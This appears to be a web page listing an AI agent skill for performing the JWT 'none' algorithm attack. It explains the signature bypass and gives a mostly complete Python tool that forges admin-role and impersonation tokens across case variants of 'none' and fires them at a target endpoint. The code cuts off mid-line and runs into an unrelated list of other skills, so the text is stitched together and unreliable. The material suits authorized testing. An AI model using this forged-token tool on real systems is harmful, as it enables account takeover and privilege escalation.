performing-jwt-none-algorithm-attack
Execute and test the JWT none algorithm attack to bypass signature verification by manipulating the alg header field in JSON Web Tokens.
What this skill does
# Performing JWT None Algorithm Attack
## Overview
The JWT none algorithm attack exploits a vulnerability in JSON Web Token libraries that accept tokens with the `alg` header set to `none`, effectively bypassing signature verification. When a server processes a JWT with `"alg": "none"`, it treats the token as valid without checking any cryptographic signature, allowing attackers to forge tokens with arbitrary claims such as escalated privileges, impersonated users, or extended expiration times. This vulnerability was first disclosed by Tim McLean in 2015 and has affected multiple JWT libraries across languages.
## When to Use
- When conducting security assessments that involve performing jwt none algorithm attack
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
## Prerequisites
- Target application using JWT for authentication or authorization
- Ability to intercept and modify HTTP requests (Burp Suite, mitmproxy)
- Python 3.8+ with PyJWT library for token crafting
- Understanding of JWT structure (Header.Payload.Signature)
- Authorization to perform security testing on the target
> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
## JWT Structure
A JWT consists of three Base64URL-encoded parts separated by dots:
```
Header.Payload.Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9. # Header
eyJzdWIiOiIxMjM0IiwibmFtZSI6IkpvaG4ifQ. # Payload
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c # Signature
```
## Attack Methodology
### Step 1: Capture a Valid JWT
Intercept a legitimate JWT from the target application using Burp Suite or browser developer tools:
```
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
```
### Step 2: Decode and Analyze the Token
```python
import base64
import json
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
parts = token.split('.')
# Decode header
header = json.loads(base64.urlsafe_b64decode(parts[0] + '=='))
print(f"Header: {header}")
# Output: {'alg': 'HS256', 'typ': 'JWT'}
# Decode payload
payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
print(f"Payload: {payload}")
# Output: {'sub': '1234567890', 'name': 'John Doe', 'role': 'user', 'iat': 1516239022}
```
### Step 3: Craft a Forged Token with None Algorithm
```python
#!/usr/bin/env python3
"""JWT None Algorithm Attack Tool
Crafts JWT tokens with the 'none' algorithm to test for
signature verification bypass vulnerabilities.
"""
import base64
import json
import requests
import sys
from typing import Optional
class JWTNoneAttack:
# All known variations of the 'none' algorithm value
NONE_VARIANTS = [
"none",
"None",
"NONE",
"nOnE",
"noNe",
"NoNe",
"nONE",
"nonE",
]
def __init__(self, target_url: str, original_token: str):
self.target_url = target_url
self.original_token = original_token
self.original_header, self.original_payload = self._decode_token(original_token)
def _base64url_encode(self, data: bytes) -> str:
"""Base64URL encode without padding."""
return base64.urlsafe_b64encode(data).rstrip(b'=').decode('utf-8')
def _base64url_decode(self, data: str) -> bytes:
"""Base64URL decode with padding restoration."""
padding = 4 - len(data) % 4
if padding != 4:
data += '=' * padding
return base64.urlsafe_b64decode(data)
def _decode_token(self, token: str) -> tuple:
"""Decode JWT header and payload."""
parts = token.split('.')
header = json.loads(self._base64url_decode(parts[0]))
payload = json.loads(self._base64url_decode(parts[1]))
return header, payload
def craft_none_token(self, modified_payload: dict,
alg_variant: str = "none") -> str:
"""Craft a JWT with the none algorithm and modified payload."""
# Create header with none algorithm
header = {"alg": alg_variant, "typ": "JWT"}
header_encoded = self._base64url_encode(json.dumps(header).encode())
# Encode modified payload
payload_encoded = self._base64url_encode(json.dumps(modified_payload).encode())
# Token with empty signature (just trailing dot)
return f"{header_encoded}.{payload_encoded}."
def craft_privilege_escalation(self, role_field: str = "role",
admin_value: str = "admin") -> list:
"""Create tokens with escalated privileges using all none variants."""
tokens = []
modified_payload = dict(self.original_payload)
modified_payload[role_field] = admin_value
for variant in self.NONE_VARIANTS:
token = self.craft_none_token(modified_payload, variant)
tokens.append({"variant": variant, "token": token})
return tokens
def craft_user_impersonation(self, target_user_id: str,
user_field: str = "sub") -> str:
"""Create a token impersonating another user."""
modified_payload = dict(self.original_payload)
modified_payload[user_field] = target_user_id
return self.craft_none_token(modified_payload)
def test_none_variants(self, endpoint: str = "/api/profile",
headers: Optional[dict] = None) -> list:
"""Test all none algorithm variants against the target."""
results = []
base_headers = headers or {}
for variant in self.NONE_VARIANTS:
modified_payload = dict(self.original_payload)
modified_payload["role"] = "admin"
token = self.craft_none_token(modified_payload, variant)
test_headers = dict(base_headers)
test_headers["Authorization"] = f"Bearer {token}"
try:
response = requests.get(
f"{self.target_url}{endpoint}",
headers=test_headers,
timeout=10
)
result = {
"variant": variant,
"status_code": response.status_code,
"accepted": response.status_code == 200,
"response_length": len(response.content),
}
results.append(result)
if response.status_code == 200:
print(f" [VULNERABLE] alg='{variant}' -> {response.status_code}")
else:
print(f" [SAFE] alg='{variant}' -> {response.status_code}")
except requests.exceptions.RequestException as e:
results.append({
"variant": variant,
"status_code": 0,
"accepted": False,
"error": str(e)
})
return results
def test_empty_signature_variants(self) -> list:
"""Test different empty signature formats."""
modified_payload = dict(self.original_payload)
modified_payload["role"] = "admin"
header = {"alg": "none", "typ": "JWT"}
header_encoded = self._base64url_encode(json.dumps(header).encode())
payload_encoded = self._base64url_encode(json.dumps(modified_payload).encode())
# Different signature formats
variants = [
f"{header_encoded}.{payload_encoded}.", # Empty signature with trailing dot
f"{header_encoded}.{payload_eRelated in Code Review
gstack
IncludedFast headless browser for QA testing and site dogfooding. Navigate pages, interact with elements, verify state, diff before/after, take annotated screenshots, test responsive layouts, forms, uploads, dialogs, and capture bug evidence. Use when asked to open or test a site, verify a deployment, dogfood a user flow, or file a bug with screenshots. (gstack)
startup-due-diligence
IncludedLegal due diligence review for seed-stage and Series A startups (US, Delaware C-Corp focus). Supports both investor and founder perspectives. Capabilities include: (1) Interactive document review and issue spotting; (2) Document request list generation; (3) Cap table and SAFE/convertible note analysis; (4) Red flag identification with severity ratings; (5) Diligence report generation. TRIGGERS: due diligence, DD, startup investment, cap table review, Series A, seed round, investor diligence, legal review startup, SAFE analysis, convertible note, 409A, founder vesting.
interview-master
IncludedThis skill should be used when the user asks to "generate interview questions", "prepare for interview", "optimize resume", "conduct mock interview", "analyze git commits for resume", "generate resume from code", "review my resume", or mentions interview preparation, career assistance, or extracting project experience from git history. Provides comprehensive interview and career development guidance for both job seekers and interviewers.
fix-issue
IncludedFixes GitHub issues using parallel analysis agents for root cause investigation, code exploration, and regression detection. Reads issue context from gh CLI, searches codebase and memory for related patterns, generates a fix with tests, and links the resolution back to the issue via PR. Includes prevention analysis to avoid recurrence. Use when debugging errors, resolving regressions, fixing bugs, or triaging issues.
sf-apex
IncludedGenerates and reviews Salesforce Apex code with 150-point scoring. TRIGGER when: user writes, reviews, or fixes Apex classes, triggers, test classes, batch/queueable/schedulable jobs, or touches .cls/.trigger files. DO NOT TRIGGER when: LWC JavaScript (use sf-lwc), Flow XML (use sf-flow), SOQL-only queries (use sf-soql), or non-Salesforce code.
swift-development
IncludedComprehensive Swift development for building, testing, and deploying iOS/macOS applications. Use when Claude needs to: (1) Build Swift packages or Xcode projects from command line, (2) Run tests with XCTest or Swift Testing framework, (3) Manage iOS simulators with simctl, (4) Handle code signing, provisioning profiles, and app distribution, (5) Format or lint Swift code with SwiftFormat/SwiftLint, (6) Work with Swift Package Manager (SPM), (7) Implement Swift 6 concurrency patterns (async/await, actors, Sendable), (8) Create SwiftUI views with MVVM architecture, (9) Set up Core Data or SwiftData persistence, or any other Swift/iOS/macOS development tasks.